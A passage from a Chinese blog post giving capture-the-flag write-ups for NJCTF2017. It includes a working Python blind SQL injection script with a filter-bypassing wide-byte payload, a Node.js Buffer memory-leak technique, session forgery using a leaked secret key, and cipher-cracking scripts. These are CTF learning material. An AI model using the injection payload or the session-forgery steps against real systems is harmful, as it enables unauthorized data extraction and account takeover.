<h2 id="Come-on"><a href="#Come-on" class="headerlink" title="Come on"></a>Come on</h2><p>拿到题目只知道是注入，一脸懵逼，看了write up才知道是宽字节布尔盲注过滤了<code>/*、*/、and、or、mid、substr、union、&gt;、&lt;、空白符、ascii</code>等敏感词，使用括号代替空格，使用left/right函数结合以代替substr()和mid()的方式进行注入，且此查询默认不区分大小写，需要使用binary()附上NSIS大佬的脚本：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># encoding: utf-8</span></div><div class="line"><span class="keyword">import</span> requests</div><div class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> quote</div><div class="line">url = <span class="string">"http://218.2.197.235:23733/index.php?key="</span></div><div class="line">payload = <span class="string">"\xc0'||(select(binary(flag))from(flag))like(0x%s)#"</span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(str)</span>:</span></div><div class="line">    u = url + quote(payload%(str.encode(<span class="string">"hex"</span>)))</div><div class="line">    ret = requests.get(u).content</div><div class="line">    <span class="keyword">return</span> <span class="string">'002265'</span> <span class="keyword">in</span> ret</div><div class="line">ans = <span class="string">""</span></div><div class="line">s = <span class="string">'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$\'()*+,-./:;&lt;=&gt;?@[\\]^`&#123;|&#125;~\'"_%'</span></div><div class="line"><span class="keyword">while</span> <span class="keyword">True</span>:</div><div class="line">    <span class="keyword">print</span> ans</div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> s:</div><div class="line">        <span class="keyword">if</span> check(ans + i + <span class="string">'%'</span>):</div><div class="line">            ans += i</div><div class="line">            <span class="keyword">break</span></div></pre></td></tr></table></figure></p>
<h2 id="Chall-I"><a href="#Chall-I" class="headerlink" title="Chall I"></a>Chall I</h2><p>查看源代码发现<code>&lt;!--a(href=&#39;/admin&#39;) admin--&gt;</code>打开/admin页面，要求输入密码而且会返回密码的md5值，到这就懵逼了，看了NeSE的write up才知道考的是一个node js的buffer漏洞。<br><figure class="highlight q"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">buffer漏洞本质上就是传入整数会导致内存泄露，由于对输入有一个<span class="built_in">md5</span>加密，那么就找个一个<span class="built_in">md5</span>加密之后是整数的值</div></pre></td></tr></table></figure></p>
<p>1518375就是一个md5后纯整数的值，提交之后出现内存泄露，多提交几次泄露出flag<br><img src="http://i1.piimg.com/567571/91e9a0546b90c52f.png" alt=""></p>
<h2 id="Chall-II"><a href="#Chall-II" class="headerlink" title="Chall II"></a>Chall II</h2><p>github有<a href="https://github.com/0lddriver/app" target="_blank" rel="external">源码</a>通过I的flag修改app的secret_key，然后以admin登录获取session与session.sign然后带着这两个Cookie去访问题目得到flag，国外的一个题目差不多原题<code>https://www.smrrd.de/nodejs-hacking-challenge-writeup.html</code><br><img src="http://i1.piimg.com/567571/b5e9fe58fac504d9.png" alt=""></p>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="konck"><a href="#konck" class="headerlink" title="konck"></a>konck</h2><figure class="highlight lasso"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="params">...</span>._<span class="params">...</span>.._.._<span class="params">...</span>._<span class="params">...</span>_<span class="params">...</span>.._<span class="params">...</span>._<span class="params">...</span>_<span class="params">...</span>_<span class="params">...</span>._<span class="params">...</span>._<span class="params">...</span><span class="params">...</span>._._<span class="params">...</span>._<span class="params">...</span>.._.._<span class="params">...</span>._<span class="params">...</span>_<span class="params">...</span>_<span class="params">...</span>._<span class="params">...</span>._<span class="params">...</span>_<span class="params">...</span>_<span class="params">...</span>._.._<span class="params">...</span>_<span class="params">...</span><span class="params">...</span>._<span class="params">...</span><span class="params">...</span><span class="params">...</span><span class="params">...</span><span class="params">...</span><span class="params">...</span></div><div class="line">zjqz hexjz mo oqrs sai daiyn lebn zjo vos ltah zjer horrqxo e iron lobdo za voou zjo vos qfqs ltah mqn qrr joto er zjo horrqxo ebooqydrztyqqojolx</div></pre></td></tr></table></figure>
<p>最开始一直以为上面的是摩斯密码，后来才知道是与下面的一一对照，是一个单表替换加栅栏解密利用<a href="http://quipqiup.com/" target="_blank" rel="external">quipqiup</a>解密得到<code>that might be easy you could find the key from this message i used fence to keep the key away from bad ass here is the message ineealcstrlaaehefg</code>,提示说flag就在后面的字母里面，栅栏一下得到<code>icanseetherealflag</code></p>
<h2 id="easy-crypto"><a href="#easy-crypto" class="headerlink" title="easy_crypto"></a>easy_crypto</h2><p>就是根据已有的加密代码跟明文与密文爆破出key然后得到key对flag.txt进行解密得到flag。<br>源程序：<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></div><div class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></div><div class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span> </span>&#123;</div><div class="line">    <span class="keyword">if</span> (argc != <span class="number">3</span>) &#123;</div><div class="line">        <span class="built_in">printf</span>(<span class="string">"USAGE: %s input_file output_file\n"</span>, argv[<span class="number">0</span>]);</div><div class="line">        <span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">    &#125;</div><div class="line">    FILE* input_file  = fopen(argv[<span class="number">1</span>], <span class="string">"rb"</span>);</div><div class="line">    FILE* output_file = fopen(argv[<span class="number">2</span>], <span class="string">"wb"</span>);</div><div class="line">    <span class="keyword">if</span> (!input_file || !output_file) &#123;</div><div class="line">        <span class="built_in">printf</span>(<span class="string">"Error\n"</span>);</div><div class="line">        <span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">char</span> key[] = <span class="string">"XXXXXXXXXXXX"</span>;</div><div class="line">    <span class="keyword">char</span> p, t, c = <span class="number">0</span>;</div><div class="line">    <span class="keyword">int</span> i = <span class="number">0</span>;</div><div class="line">    <span class="keyword">while</span> ((p = fgetc(input_file)) != EOF) &#123;</div><div class="line">        c = ((key[i % <span class="built_in">strlen</span>(key)] ^ t) + (p-t) + i*i ) &amp; <span class="number">0xff</span>;</div><div class="line">        t = p;</div><div class="line">        i++;</div><div class="line">        fputc(c, output_file);</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>爆破key：<br><figure class="highlight nix"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"><span class="attr">flag=open('cipher.txt','rb')</span></div><div class="line"><span class="attr">cipher=open('plain.txt','rb')</span></div><div class="line"><span class="attr">cipher_=cipher.read()</span></div><div class="line"><span class="attr">flag_=flag.read()</span></div><div class="line"><span class="attr">p=0</span></div><div class="line"><span class="attr">t=0</span></div><div class="line"><span class="attr">x=[]</span></div><div class="line"><span class="attr">z=''</span></div><div class="line">for i <span class="keyword">in</span> range(<span class="number">0</span>,len(flag_)):</div><div class="line">	<span class="attr">p=ord(cipher_[i])</span></div><div class="line">	<span class="attr">c=(ord(flag_[i])-(p-t)-i*i)&amp;0xff^t</span></div><div class="line">	<span class="attr">t=p</span></div><div class="line">	<span class="attr">z=z+chr(c)</span></div><div class="line">print z</div></pre></td></tr></table></figure></p>
<p>解密flag：<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">g=<span class="keyword">open</span>(<span class="string">'flag.txt'</span>,<span class="string">'rb'</span>).read()</div><div class="line">key=<span class="string">'OKIWILLLETYOUKNOWWHATTHEKEYIS'</span></div><div class="line">c = <span class="string">''</span></div><div class="line">t = <span class="keyword">chr</span>(<span class="number">0</span>)</div><div class="line">i = <span class="number">0</span></div><div class="line"><span class="keyword">x</span>=<span class="string">''</span></div><div class="line"><span class="keyword">for</span> p in g:</div><div class="line">    c = <span class="keyword">chr</span>(<span class="keyword">ord</span>(p)+<span class="keyword">ord</span>(t) - i*i - (<span class="keyword">ord</span>(key[i % len(key)]) ^ <span class="keyword">ord</span>(t)) &amp; <span class="number">0xff</span>)</div><div class="line">    t = c</div><div class="line">    i += <span class="number">1</span></div><div class="line">    <span class="keyword">x</span>+=c</div><div class="line"><span class="keyword">print</span> <span class="keyword">x</span></div></pre></td></tr></table></figure></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      Isron
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://isron.cn/2017/03/15/NJCTF2017/" title="NJCTF2017">http://isron.cn/2017/03/15/NJCTF2017/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Write-up/" rel="tag"># Write-up</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/03/13/Jarvis-OJ_api/" rel="next" title="Jarvis OJ api调用">
                <i class="fa fa-chevron-left"></i> Jarvis OJ api调用
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/03/15/Linux_shell/" rel="prev" title="Linux 下命令分割符的区别">
                Linux 下命令分割符的区别 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="cloud-tie-wrapper" class="cloud-tie-wrapper"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/img/111.png"
               alt="Isron" />
          <p class="site-author-name" itemprop="name">Isron</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">34</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">9</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">26</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=isron@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Email
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/3262993654/profile?rightmod=1&wvr=6&mod=personinfo&is_all=1" target="_blank" title="新浪微博">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  新浪微博
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://github.com/clearloveQAQ" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://rcoil.me/" title="RcoIl" target="_blank">RcoIl</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://zjw.dropsec.xyz/" title="Hello_C" target="_blank">Hello_C</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://blog.dropsec.xyz/" title="Drops" target="_blank">Drops</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://whc.dropsec.xyz/" title="Haigo" target="_blank">Haigo</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xq.dropsec.xyz/" title="Mr_white" target="_blank">Mr_white</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Web"><span class="nav-number">1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Login"><span class="nav-number">1.1.</span> <span class="nav-text">Login</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Get-Flag"><span class="nav-number">1.2.</span> <span class="nav-text">Get Flag</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Text-wall"><span class="nav-number">1.3.</span> <span class="nav-text">Text wall</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SHA1加密与MD5"><span class="nav-number">1.3.1.</span> <span class="nav-text">SHA1加密与MD5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#源码泄露"><span class="nav-number">1.3.2.</span> <span class="nav-text">源码泄露</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Wallet"><span class="nav-number">1.4.</span> <span class="nav-text">Wallet</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pictures-wall"><span class="nav-number">1.5.</span> <span class="nav-text">pictures wall</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Guess"><span class="nav-number">1.6.</span> <span class="nav-text">Guess</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Come-on"><span class="nav-number">1.7.</span> <span class="nav-text">Come on</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Chall-I"><span class="nav-number">1.8.</span> <span class="nav-text">Chall I</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Chall-II"><span class="nav-number">1.9.</span> <span class="nav-text">Chall II</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISC"><span class="nav-number">2.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#konck"><span class="nav-number">2.1.</span> <span class="nav-text">konck</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#easy-crypto"><span class="nav-number">2.2.</span> <span class="nav-text">easy_crypto</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Isron</span>
</div>



        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  
    
    <script>
      var cloudTieConfig = {
        url: document.location.href, 
        sourceId: "",
        productKey: "9940cf6a1e8f4f189c79fd76f9433ce2",
        target: "cloud-tie-wrapper"
      };
    </script>
    <script src="https://img1.ws.126.net/f2e/tie/yun/sdk/loader.js"></script>
  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

</body>
</html>
